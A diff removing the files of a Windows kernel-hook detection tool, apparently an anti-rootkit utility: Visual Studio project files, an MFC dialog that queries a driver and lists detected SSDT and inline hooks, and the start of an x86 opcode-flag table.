<ResourceCompile Include="CheckKernelHook.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
<ProjectExtensions>
<VisualStudio>
<UserProperties RESOURCE_FILE="CheckKernelHook.rc" />
</VisualStudio>
</ProjectExtensions>
</Project>


@ -1,65 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
<None Include="res\CheckKernelHook.rc2">
<Filter>资源文件</Filter>
</None>
<None Include="res\CheckKernelHook.ico">
<Filter>资源文件</Filter>
</None>
</ItemGroup>
<ItemGroup>
<ClInclude Include="CheckKernelHook.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="CheckKernelHookDlg.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="stdafx.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="Resource.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="AddService.h">
<Filter>源文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="CheckKernelHook.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="CheckKernelHookDlg.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="stdafx.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="AddService.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CheckKernelHook.rc">
<Filter>资源文件</Filter>
</ResourceCompile>
</ItemGroup>
</Project>


@ -1,283 +0,0 @@
// CheckKernelHookDlg.cpp : 实现文件
//
#include "stdafx.h"
#include "CheckKernelHook.h"
#include "CheckKernelHookDlg.h"
#include "afxdialogex.h"
#include "AddService.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
HANDLE g_hDevice = NULL;
typedef struct
{
WCHAR* szTitle; //列表的名称
int nWidth; //列表的宽度
}COLUMNSTRUCT;
COLUMNSTRUCT g_Column_Data_Online[] =
{
{L"原始地址", 148 },
{L"函数名称", 150 },
{L"Hook地址", 160 },
{L"模块名称", 300 },
{L"模块基址", 80 },
{L"模块大小", 81 },
{L"类型", 81 }
};
int g_Column_Count_Online = 7; //列表的个数
int g_Column_Online_Width = 0;
// 用于应用程序“关于”菜单项的 CAboutDlg 对话框
class CAboutDlg : public CDialogEx
{
public:
CAboutDlg();
// 对话框数据
enum { IDD = IDD_ABOUTBOX };
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持
// 实现
protected:
DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialogEx(CAboutDlg::IDD)
{
}
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialogEx::DoDataExchange(pDX);
}
BEGIN_MESSAGE_MAP(CAboutDlg, CDialogEx)
END_MESSAGE_MAP()
// CCheckKernelHookDlg 对话框
CCheckKernelHookDlg::CCheckKernelHookDlg(CWnd* pParent /*=NULL*/)
: CDialogEx(CCheckKernelHookDlg::IDD, pParent)
{
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
void CCheckKernelHookDlg::DoDataExchange(CDataExchange* pDX)
{
CDialogEx::DoDataExchange(pDX);
DDX_Control(pDX, IDC_LIST, m_List);
}
BEGIN_MESSAGE_MAP(CCheckKernelHookDlg, CDialogEx)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
END_MESSAGE_MAP()
// CCheckKernelHookDlg 消息处理程序
BOOL CCheckKernelHookDlg::OnInitDialog()
{
CDialogEx::OnInitDialog();
// 将“关于...”菜单项添加到系统菜单中。
// IDM_ABOUTBOX 必须在系统命令范围内。
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
BOOL bNameValid;
CString strAboutMenu;
bNameValid = strAboutMenu.LoadString(IDS_ABOUTBOX);
ASSERT(bNameValid);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// 设置此对话框的图标。当应用程序主窗口不是对话框时,框架将自动
// 执行此操作
SetIcon(m_hIcon, TRUE); // 设置大图标
SetIcon(m_hIcon, FALSE); // 设置小图标
m_List.SetExtendedStyle(LVS_EX_FULLROWSELECT);
for (int i = 0; i < g_Column_Count_Online; i++)
{
m_List.InsertColumn(i, g_Column_Data_Online[i].szTitle,LVCFMT_CENTER,g_Column_Data_Online[i].nWidth);
g_Column_Online_Width+=g_Column_Data_Online[i].nWidth;
}
//LoadDrv(L"CheckKernelHook");
g_hDevice = OpenDevice(L"\\\\.\\CheckKernelHookLinkName");
if (g_hDevice==(HANDLE)-1)
{
MessageBox(L"打开设备失败");
return TRUE;
}
CheckKernelHook();
return TRUE; // 除非将焦点设置到控件,否则返回 TRUE
}
VOID CCheckKernelHookDlg::CheckKernelHook()
{
ULONG_PTR ulCount = 0x1000;
PINLINEHOOKINFO PInlineHookInfo = NULL;
BOOL bRet = FALSE;
DWORD ulReturnSize = 0;
do
{
ULONG_PTR ulSize = 0;
if (PInlineHookInfo)
{
free(PInlineHookInfo);
PInlineHookInfo = NULL;
}
ulSize = sizeof(INLINEHOOKINFO) + ulCount * sizeof(INLINEHOOKINFO_INFORMATION);
PInlineHookInfo = (PINLINEHOOKINFO)malloc(ulSize);
if (!PInlineHookInfo)
{
break;
}
memset(PInlineHookInfo,0,ulSize);
bRet = DeviceIoControl(g_hDevice,CTL_CHECKKERNELMODULE,
NULL,
0,
PInlineHookInfo,
ulSize,
&ulReturnSize,
NULL);
ulCount = PInlineHookInfo->ulCount + 1000;
} while (bRet == FALSE && GetLastError() == ERROR_INSUFFICIENT_BUFFER);
if(PInlineHookInfo->ulCount==0)
{
MessageBox(L"当前内核安全",L"");
}
else
{
InsertDataToList(PInlineHookInfo);
}
if (PInlineHookInfo)
{
free(PInlineHookInfo);
PInlineHookInfo = NULL;
}
}
VOID CCheckKernelHookDlg::InsertDataToList(PINLINEHOOKINFO PInlineHookInfo)
{
CString OrgAddress,CurAddress,ModuleBase,ModuleSize;
for(int i=0;i<PInlineHookInfo->ulCount;i++)
{
OrgAddress.Format(L"0x%p",PInlineHookInfo->InlineHook[i].ulMemoryFunctionBase);
CurAddress.Format(L"0x%p",PInlineHookInfo->InlineHook[i].ulMemoryHookBase);
ModuleBase.Format(L"0x%p",PInlineHookInfo->InlineHook[i].ulHookModuleBase);
ModuleSize.Format(L"%d",PInlineHookInfo->InlineHook[i].ulHookModuleSize);
int n = m_List.InsertItem(m_List.GetItemCount(),OrgAddress,0); //注意这里的i 就是Icon 在数组的位置
CString szFunc=L"";
CString ModuleName = L"";
szFunc +=PInlineHookInfo->InlineHook[i].lpszFunction;
ModuleName += PInlineHookInfo->InlineHook[i].lpszHookModuleImage;
m_List.SetItemText(n,1,szFunc);
m_List.SetItemText(n,2,CurAddress);
m_List.SetItemText(n,3,ModuleName);
m_List.SetItemText(n,4,ModuleBase);
m_List.SetItemText(n,5,ModuleSize);
CString Type= L"";
if(PInlineHookInfo->InlineHook[i].ulHookType==1)
{
Type +=L"SSDT Hook";
}
else if(PInlineHookInfo->InlineHook[i].ulHookType==2)
{
Type +=L"Next Call Hook";
}
else if(PInlineHookInfo->InlineHook[i].ulHookType==0)
{
Type +=L"Inline Hook";
}
m_List.SetItemText(n,6,Type);
}
UpdateData(TRUE);
}
void CCheckKernelHookDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialogEx::OnSysCommand(nID, lParam);
}
}
// 如果向对话框添加最小化按钮,则需要下面的代码
// 来绘制该图标。对于使用文档/视图模型的 MFC 应用程序,
// 这将由框架自动完成。
void CCheckKernelHookDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // 用于绘制的设备上下文
SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);
// 使图标在工作区矩形中居中
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// 绘制图标
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialogEx::OnPaint();
}
}
//当用户拖动最小化窗口时系统调用此函数取得光标
//显示。
HCURSOR CCheckKernelHookDlg::OnQueryDragIcon()
{
return static_cast<HCURSOR>(m_hIcon);
}


@ -1,76 +0,0 @@
// CheckKernelHookDlg.h : 头文件
//
#pragma once
#include "afxcmn.h"
#include "resource.h"
#include <WinIoCtl.h>
typedef struct _INLINEHOOKINFO_INFORMATION { //INLINEHOOKINFO_INFORMATION
ULONG ulHookType;
ULONG ulMemoryFunctionBase; //原始地址
ULONG ulMemoryHookBase; //HOOK 地址
CHAR lpszFunction[256];
CHAR lpszHookModuleImage[256];
ULONG ulHookModuleBase;
ULONG ulHookModuleSize;
} INLINEHOOKINFO_INFORMATION, *PINLINEHOOKINFO_INFORMATION;
typedef struct _INLINEHOOKINFO { //InlineHook
ULONG ulCount;
INLINEHOOKINFO_INFORMATION InlineHook[1];
} INLINEHOOKINFO, *PINLINEHOOKINFO;
#define CTL_CHECKKERNELMODULE \
CTL_CODE(FILE_DEVICE_UNKNOWN,0x830,METHOD_NEITHER,FILE_ANY_ACCESS)
// CCheckKernelHookDlg 对话框
class CCheckKernelHookDlg : public CDialogEx
{
// 构造
public:
CCheckKernelHookDlg(CWnd* pParent = NULL); // 标准构造函数
// 对话框数据
enum { IDD = IDD_CHECKKERNELHOOK_DIALOG };
VOID CheckKernelHook();
VOID InsertDataToList(PINLINEHOOKINFO PInlineHookInfo);
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持
HANDLE OpenDevice(LPCTSTR wzLinkPath)
{
HANDLE hDevice = CreateFile(wzLinkPath,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
}
return hDevice;
}
// 实现
protected:
HICON m_hIcon;
// 生成的消息映射函数
virtual BOOL OnInitDialog();
afx_msg void OnSysCommand(UINT nID, LPARAM lParam);
afx_msg void OnPaint();
afx_msg HCURSOR OnQueryDragIcon();
DECLARE_MESSAGE_MAP()
public:
CListCtrl m_List;
};


@ -1,8 +0,0 @@
// stdafx.cpp : 只包括标准包含文件的源文件
// CheckKernelHook.pch 将作为预编译头
// stdafx.obj 将包含预编译类型信息
#include "stdafx.h"


@ -1,58 +0,0 @@
// stdafx.h : 标准系统包含文件的包含文件,
// 或是经常使用但不常更改的
// 特定于项目的包含文件
#pragma once
#ifndef _SECURE_ATL
#define _SECURE_ATL 1
#endif
#ifndef VC_EXTRALEAN
#define VC_EXTRALEAN // 从 Windows 头中排除极少使用的资料
#endif
#include "targetver.h"
#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // 某些 CString 构造函数将是显式的
// 关闭 MFC 对某些常见但经常可放心忽略的警告消息的隐藏
#define _AFX_ALL_WARNINGS
#include <afxwin.h> // MFC 核心组件和标准组件
#include <afxext.h> // MFC 扩展
#include <afxdisp.h> // MFC 自动化类
#ifndef _AFX_NO_OLE_SUPPORT
#include <afxdtctl.h> // MFC 对 Internet Explorer 4 公共控件的支持
#endif
#ifndef _AFX_NO_AFXCMN_SUPPORT
#include <afxcmn.h> // MFC 对 Windows 公共控件的支持
#endif // _AFX_NO_AFXCMN_SUPPORT
#include <afxcontrolbars.h> // 功能区和控件条的 MFC 支持
#ifdef _UNICODE
#if defined _M_IX86
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"")
#elif defined _M_X64
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\"")
#else
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
#endif
#endif


@ -1,8 +0,0 @@
#pragma once
// 包括 SDKDDKVer.h 将定义最高版本的可用 Windows 平台。
// 如果要为以前的 Windows 平台生成应用程序,请包括 WinSDKVer.h并将
// WIN32_WINNT 宏设置为要支持的平台,然后再包括 SDKDDKVer.h。
#include <SDKDDKVer.h>


@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CheckKernelHook", "CheckKernelHook\CheckKernelHook.vcxproj", "{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}.Debug|Win32.ActiveCfg = WinDDK|Win32
{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}.Debug|Win32.Build.0 = WinDDK|Win32
{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}.Release|Win32.ActiveCfg = WinDDK|Win32
{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}.Release|Win32.Build.0 = WinDDK|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -1,82 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="WinDDK|Win32">
<Configuration>WinDDK</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Common.c" />
<ClCompile Include="DriverEntry.c" />
<ClCompile Include="FileSystem.c" />
<ClCompile Include="FixRelocation.c" />
<ClCompile Include="KernelHookCheck.c" />
<ClCompile Include="KernelReload.c" />
<ClCompile Include="libdasm.c" />
<ClCompile Include="Reload.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="Common.h" />
<ClInclude Include="DriverEntry.h" />
<ClInclude Include="FileSystem.h" />
<ClInclude Include="FixRelocation.h" />
<ClInclude Include="KernelHookCheck.h" />
<ClInclude Include="KernelReload.h" />
<ClInclude Include="libdasm.h" />
<ClInclude Include="Reload.h" />
<ClInclude Include="tables.h" />
</ItemGroup>
<ItemGroup>
<None Include="sources" />
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>"CheckKernelHook"</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='WinDDK|Win32'">
<TargetExt>.sys</TargetExt>
<GenerateManifest>false</GenerateManifest>
<ExecutablePath>$(WLHBASE)\bin\x86\x86;$(WLHBASE)\bin\x86</ExecutablePath>
<IncludePath>$(WLHBASE)\inc\api;$(WLHBASE)\inc\crt;$(WLHBASE)\inc\ddk;$(WLHBASE)\inc</IncludePath>
<ReferencePath />
<LibraryPath>$(WLHBASE)\lib\win7\i386</LibraryPath>
<SourcePath />
<ExcludePath />
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='WinDDK|Win32'">
<ClCompile>
<PreprocessorDefinitions>_X86_;DBG=1</PreprocessorDefinitions>
<ExceptionHandling>false</ExceptionHandling>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CallingConvention>StdCall</CallingConvention>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>
</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<AdditionalDependencies>ntoskrnl.lib;hal.lib;wdm.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<Link>
<IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries>
<SubSystem>Native</SubSystem>
<Driver>Driver</Driver>
<EntryPointSymbol>DriverEntry</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<BaseAddress>0x10000</BaseAddress>
<RandomizedBaseAddress>
</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
</Link>
</ItemDefinitionGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -1,48 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="Common.c" />
<ClCompile Include="DriverEntry.c" />
<ClCompile Include="KernelHookCheck.c" />
<ClCompile Include="libdasm.c" />
<ClCompile Include="FileSystem.c">
<Filter>Reload</Filter>
</ClCompile>
<ClCompile Include="FixRelocation.c">
<Filter>Reload</Filter>
</ClCompile>
<ClCompile Include="KernelReload.c">
<Filter>Reload</Filter>
</ClCompile>
<ClCompile Include="Reload.c">
<Filter>Reload</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Common.h" />
<ClInclude Include="DriverEntry.h" />
<ClInclude Include="KernelHookCheck.h" />
<ClInclude Include="libdasm.h" />
<ClInclude Include="tables.h" />
<ClInclude Include="FileSystem.h">
<Filter>Reload</Filter>
</ClInclude>
<ClInclude Include="FixRelocation.h">
<Filter>Reload</Filter>
</ClInclude>
<ClInclude Include="KernelReload.h">
<Filter>Reload</Filter>
</ClInclude>
<ClInclude Include="Reload.h">
<Filter>Reload</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<None Include="sources" />
</ItemGroup>
<ItemGroup>
<Filter Include="Reload">
<UniqueIdentifier>{7f84aa62-4fe1-452a-a193-32b7b7a3e2db}</UniqueIdentifier>
</Filter>
</ItemGroup>
</Project>


@ -1,783 +0,0 @@
#include "Common.h"
#include "Reload.h"
UCHAR OpcodeFlags[256] =
{
OP_MODRM, // 00
OP_MODRM, // 01
OP_MODRM, // 02
OP_MODRM, // 03
OP_DATA_I8, // 04
OP_DATA_PRE66_67, // 05
OP_NONE, // 06
OP_NONE, // 07
OP_MODRM, // 08
OP_MODRM, // 09
OP_MODRM, // 0A
OP_MODRM, // 0B
OP_DATA_I8, // 0C
OP_DATA_PRE66_67, // 0D
OP_NONE, // 0E
OP_NONE, // 0F
OP_MODRM, // 10
OP_MODRM, // 11
OP_MODRM, // 12
OP_MODRM, // 13
OP_DATA_I8, // 14
OP_DATA_PRE66_67, // 15
OP_NONE, // 16
OP_NONE, // 17
OP_MODRM, // 18
OP_MODRM, // 19
OP_MODRM, // 1A
OP_MODRM, // 1B
OP_DATA_I8, // 1C
OP_DATA_PRE66_67, // 1D
OP_NONE, // 1E
OP_NONE, // 1F
OP_MODRM, // 20
OP_MODRM, // 21
OP_MODRM, // 22
OP_MODRM, // 23
OP_DATA_I8, // 24
OP_DATA_PRE66_67, // 25
OP_NONE, // 26
OP_NONE, // 27
OP_MODRM, // 28
OP_MODRM, // 29
OP_MODRM, // 2A
OP_MODRM, // 2B
OP_DATA_I8, // 2C
OP_DATA_PRE66_67, // 2D
OP_NONE, // 2E
OP_NONE, // 2F
OP_MODRM, // 30
OP_MODRM, // 31
OP_MODRM, // 32
OP_MODRM, // 33
OP_DATA_I8, // 34
OP_DATA_PRE66_67, // 35
OP_NONE, // 36
OP_NONE, // 37
OP_MODRM, // 38
OP_MODRM, // 39
OP_MODRM, // 3A
OP_MODRM, // 3B
OP_DATA_I8, // 3C
OP_DATA_PRE66_67, // 3D
OP_NONE, // 3E
OP_NONE, // 3F
OP_NONE, // 40
OP_NONE, // 41
OP_NONE, // 42
OP_NONE, // 43
OP_NONE, // 44
OP_NONE, // 45
OP_NONE, // 46
OP_NONE, // 47
OP_NONE, // 48
OP_NONE, // 49
OP_NONE, // 4A
OP_NONE, // 4B
OP_NONE, // 4C
OP_NONE, // 4D
OP_NONE, // 4E
OP_NONE, // 4F
OP_NONE, // 50
OP_NONE, // 51
OP_NONE, // 52
OP_NONE, // 53
OP_NONE, // 54
OP_NONE, // 55
OP_NONE, // 56
OP_NONE, // 57
OP_NONE, // 58
OP_NONE, // 59
OP_NONE, // 5A
OP_NONE, // 5B
OP_NONE, // 5C
OP_NONE, // 5D
OP_NONE, // 5E
OP_NONE, // 5F
OP_NONE, // 60
OP_NONE, // 61
OP_MODRM, // 62
OP_MODRM, // 63
OP_NONE, // 64
OP_NONE, // 65
OP_NONE, // 66
OP_NONE, // 67
OP_DATA_PRE66_67, // 68
OP_MODRM | OP_DATA_PRE66_67, // 69
OP_DATA_I8, // 6A
OP_MODRM | OP_DATA_I8, // 6B
OP_NONE, // 6C
OP_NONE, // 6D
OP_NONE, // 6E
OP_NONE, // 6F
OP_DATA_I8, // 70
OP_DATA_I8, // 71
OP_DATA_I8, // 72
OP_DATA_I8, // 73
OP_DATA_I8, // 74
OP_DATA_I8, // 75
OP_DATA_I8, // 76
OP_DATA_I8, // 77
OP_DATA_I8, // 78
OP_DATA_I8, // 79
OP_DATA_I8, // 7A
OP_DATA_I8, // 7B
OP_DATA_I8, // 7C
OP_DATA_I8, // 7D
OP_DATA_I8, // 7E
OP_DATA_I8, // 7F
OP_MODRM | OP_DATA_I8, // 80
OP_MODRM | OP_DATA_PRE66_67, // 81
OP_MODRM | OP_DATA_I8, // 82
OP_MODRM | OP_DATA_I8, // 83
OP_MODRM, // 84
OP_MODRM, // 85
OP_MODRM, // 86
OP_MODRM, // 87
OP_MODRM, // 88
OP_MODRM, // 89
OP_MODRM, // 8A
OP_MODRM, // 8B
OP_MODRM, // 8C
OP_MODRM, // 8D
OP_MODRM, // 8E
OP_MODRM, // 8F
OP_NONE, // 90
OP_NONE, // 91
OP_NONE, // 92
OP_NONE, // 93
OP_NONE, // 94
OP_NONE, // 95
OP_NONE, // 96
OP_NONE, // 97
OP_NONE, // 98
OP_NONE, // 99
OP_DATA_I16 | OP_DATA_PRE66_67,// 9A
OP_NONE, // 9B
OP_NONE, // 9C
OP_NONE, // 9D
OP_NONE, // 9E
OP_NONE, // 9F
OP_DATA_PRE66_67, // A0
OP_DATA_PRE66_67, // A1
OP_DATA_PRE66_67, // A2
OP_DATA_PRE66_67, // A3
OP_NONE, // A4
OP_NONE, // A5
OP_NONE, // A6
OP_NONE, // A7
OP_DATA_I8, // A8
OP_DATA_PRE66_67, // A9
OP_NONE, // AA
OP_NONE, // AB
OP_NONE, // AC
OP_NONE, // AD
OP_NONE, // AE
OP_NONE, // AF
OP_DATA_I8, // B0
OP_DATA_I8, // B1
OP_DATA_I8, // B2
OP_DATA_I8, // B3
OP_DATA_I8, // B4
OP_DATA_I8, // B5
OP_DATA_I8, // B6
OP_DATA_I8, // B7
OP_DATA_PRE66_67, // B8
OP_DATA_PRE66_67, // B9
OP_DATA_PRE66_67, // BA
OP_DATA_PRE66_67, // BB
OP_DATA_PRE66_67, // BC
OP_DATA_PRE66_67, // BD
OP_DATA_PRE66_67, // BE
OP_DATA_PRE66_67, // BF
OP_MODRM | OP_DATA_I8, // C0
OP_MODRM | OP_DATA_I8, // C1
OP_DATA_I16, // C2
OP_NONE, // C3
OP_MODRM, // C4
OP_MODRM, // C5
OP_MODRM | OP_DATA_I8, // C6
OP_MODRM | OP_DATA_PRE66_67, // C7
OP_DATA_I8 | OP_DATA_I16, // C8
OP_NONE, // C9
OP_DATA_I16, // CA
OP_NONE, // CB
OP_NONE, // CC
OP_DATA_I8, // CD
OP_NONE, // CE
OP_NONE, // CF
OP_MODRM, // D0
OP_MODRM, // D1
OP_MODRM, // D2
OP_MODRM, // D3
OP_DATA_I8, // D4
OP_DATA_I8, // D5
OP_NONE, // D6
OP_NONE, // D7
OP_WORD, // D8
OP_WORD, // D9
OP_WORD, // DA
OP_WORD, // DB
OP_WORD, // DC
OP_WORD, // DD
OP_WORD, // DE
OP_WORD, // DF
OP_DATA_I8, // E0
OP_DATA_I8, // E1
OP_DATA_I8, // E2
OP_DATA_I8, // E3
OP_DATA_I8, // E4
OP_DATA_I8, // E5
OP_DATA_I8, // E6
OP_DATA_I8, // E7
OP_DATA_PRE66_67 | OP_REL32, // E8
OP_DATA_PRE66_67 | OP_REL32, // E9
OP_DATA_I16 | OP_DATA_PRE66_67,// EA
OP_DATA_I8, // EB
OP_NONE, // EC
OP_NONE, // ED
OP_NONE, // EE
OP_NONE, // EF
OP_NONE, // F0
OP_NONE, // F1
OP_NONE, // F2
OP_NONE, // F3
OP_NONE, // F4
OP_NONE, // F5
OP_MODRM, // F6
OP_MODRM, // F7
OP_NONE, // F8
OP_NONE, // F9
OP_NONE, // FA
OP_NONE, // FB
OP_NONE, // FC
OP_NONE, // FD
OP_MODRM, // FE
OP_MODRM | OP_REL32 // FF
};
UCHAR OpcodeFlagsExt[256] =
{
OP_MODRM, // 00
OP_MODRM, // 01
OP_MODRM, // 02
OP_MODRM, // 03
OP_NONE, // 04
OP_NONE, // 05
OP_NONE, // 06
OP_NONE, // 07
OP_NONE, // 08
OP_NONE, // 09
OP_NONE, // 0A
OP_NONE, // 0B
OP_NONE, // 0C
OP_MODRM, // 0D
OP_NONE, // 0E
OP_MODRM | OP_DATA_I8, // 0F
OP_MODRM, // 10
OP_MODRM, // 11
OP_MODRM, // 12
OP_MODRM, // 13
OP_MODRM, // 14
OP_MODRM, // 15
OP_MODRM, // 16
OP_MODRM, // 17
OP_MODRM, // 18
OP_NONE, // 19
OP_NONE, // 1A
OP_NONE, // 1B
OP_NONE, // 1C
OP_NONE, // 1D
OP_NONE, // 1E
OP_NONE, // 1F
OP_MODRM, // 20
OP_MODRM, // 21
OP_MODRM, // 22
OP_MODRM, // 23
OP_MODRM, // 24
OP_NONE, // 25
OP_MODRM, // 26
OP_NONE, // 27
OP_MODRM, // 28
OP_MODRM, // 29
OP_MODRM, // 2A
OP_MODRM, // 2B
OP_MODRM, // 2C
OP_MODRM, // 2D
OP_MODRM, // 2E
OP_MODRM, // 2F
OP_NONE, // 30
OP_NONE, // 31
OP_NONE, // 32
OP_NONE, // 33
OP_NONE, // 34
OP_NONE, // 35
OP_NONE, // 36
OP_NONE, // 37
OP_NONE, // 38
OP_NONE, // 39
OP_NONE, // 3A
OP_NONE, // 3B
OP_NONE, // 3C
OP_NONE, // 3D
OP_NONE, // 3E
OP_NONE, // 3F
OP_MODRM, // 40
OP_MODRM, // 41
OP_MODRM, // 42
OP_MODRM, // 43
OP_MODRM, // 44
OP_MODRM, // 45
OP_MODRM, // 46
OP_MODRM, // 47
OP_MODRM, // 48
OP_MODRM, // 49
OP_MODRM, // 4A
OP_MODRM, // 4B
OP_MODRM, // 4C
OP_MODRM, // 4D
OP_MODRM, // 4E
OP_MODRM, // 4F
OP_MODRM, // 50
OP_MODRM, // 51
OP_MODRM, // 52
OP_MODRM, // 53
OP_MODRM, // 54
OP_MODRM, // 55
OP_MODRM, // 56
OP_MODRM, // 57
OP_MODRM, // 58
OP_MODRM, // 59
OP_MODRM, // 5A
OP_MODRM, // 5B
OP_MODRM, // 5C
OP_MODRM, // 5D
OP_MODRM, // 5E
OP_MODRM, // 5F
OP_MODRM, // 60
OP_MODRM, // 61
OP_MODRM, // 62
OP_MODRM, // 63
OP_MODRM, // 64
OP_MODRM, // 65
OP_MODRM, // 66
OP_MODRM, // 67
OP_MODRM, // 68
OP_MODRM, // 69
OP_MODRM, // 6A
OP_MODRM, // 6B
OP_MODRM, // 6C
OP_MODRM, // 6D
OP_MODRM, // 6E
OP_MODRM, // 6F
OP_MODRM | OP_DATA_I8, // 70
OP_MODRM | OP_DATA_I8, // 71
OP_MODRM | OP_DATA_I8, // 72
OP_MODRM | OP_DATA_I8, // 73
OP_MODRM, // 74
OP_MODRM, // 75
OP_MODRM, // 76
OP_NONE, // 77
OP_NONE, // 78
OP_NONE, // 79
OP_NONE, // 7A
